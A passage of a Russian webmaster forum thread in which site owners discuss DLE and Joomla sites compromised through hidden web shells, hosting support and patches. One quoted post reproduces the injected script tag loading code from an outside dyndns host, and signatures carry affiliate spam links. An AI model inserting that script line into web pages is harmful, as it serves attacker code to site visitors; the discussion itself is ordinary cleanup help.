Вредоносный код

1 234
Хортица
На сайте с 22.12.2006
Offline
289
#21

fantom771, у Вас аналогичная проблема - шелл где то живет, а кто то им и соответсвенно Вашими сайтами управляет по своему усмотрению.

На XBit.Money (https://xbit.money/?rid=111) меняю крипту на гривны. Лучшие курсы Обмен Вашего PayPal/ЯД/QIWI/WebMoney и куча плюшек! Рекомендую (https://exchangex.ru/index.php?who=26749)
F7
На сайте с 04.05.2010
Offline
34
#22
Хортица:
fantom771, у Вас аналогичная проблема - шелл где то живет, а кто то им и соответсвенно Вашими сайтами управляет по своему усмотрению.

Я так понимаю что тут ничего не сделаеш сам.....если к хостеру обратитьса?

Хортица
На сайте с 22.12.2006
Offline
289
#23

fantom771, смотря какой хостер.

Роман
На сайте с 30.04.2008
Offline
261
#24

http://arbitrage.webmoney.ru/asp/claims.asp?wmid=206527657497

моя претензия, посмотрим что будет дальше

F7
На сайте с 04.05.2010
Offline
34
#25
Хортица:
fantom771, смотря какой хостер.

написал хостеру в течении нескольких часов проверили сайты сказали где вредоносный код....проверили сервер ....говорят шеллов нет.

Код удалил.....буду смотреть что дальше будет происходить.

Хортица
На сайте с 22.12.2006
Offline
289
#26

Сегодня обнаружилась еще одна уязвимость в ДЛЕ, сайты разных версий 8.0, 8.3, 9.2, 9.4. Все известные заплатки были установлены. Свой сервер. От "соседей" проникнуть не могли. Стоит контроль доступа к файлам, проверка на наличие в файлах функций шела и прочие примочки безопасности. Все это дело обошли.

В логах уже нашел как и что делали через шелы. Но как залили эти шелы пока не нашел. Логов почти на 1,5 Гб...

Так что будьте бдительны, ДЛЕ шлет пламенный привет безопасности в очередной раз!

F7
На сайте с 04.05.2010
Offline
34
#27
Хортица:
Сегодня обнаружилась еще одна уязвимость в ДЛЕ, сайты разных версий 8.0, 8.3, 9.2, 9.4. Все известные заплатки были установлены. Свой сервер. От "соседей" проникнуть не могли. Стоит контроль доступа к файлам, проверка на наличие в файлах функций шела и прочие примочки безопасности. Все это дело обошли.
В логах уже нашел как и что делали через шелы. Но как залили эти шелы пока не нашел. Логов почти на 1,5 Гб...
Так что будьте бдительны, ДЛЕ шлет пламенный привет безопасности в очередной раз!

Какие заплатки ставили если не секрет?Если можно ссылочки на них в личку киньте(dle 8.3)

Хортица
На сайте с 22.12.2006
Offline
289
#28

fantom771, это наверное не для кого не секрет:

F7
На сайте с 04.05.2010
Offline
34
#29
Хортица:
fantom771, это наверное не для кого не секрет:

Спасибо🍻

P
На сайте с 09.11.2011
Offline
0
#30
fantom771:
Здравствуйте.При проверке сайта Яндекс нашел вредоносный код <script src="http://epic-win.dyndns.org/host.php?id=159"></script>.Перерыл весь движок(DLE) но так ничего и не нашел.😡Смотрел все измененные файлы за последнее время.Подскажите где он может прятатьса.Может быть кто то с таким сталкивалса.
Заранее спасибо за ответы.

Было такое и не один раз, долго мучился пока не установил джумлу (у меня джумла) с нуля и на ее базу данных накатил, все теперь вирусов нет...

Бесплатная раскрутка сайта без поисковых систем http://pokazannikovevgenii.pereverzev.e-autopay.com
1 234

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий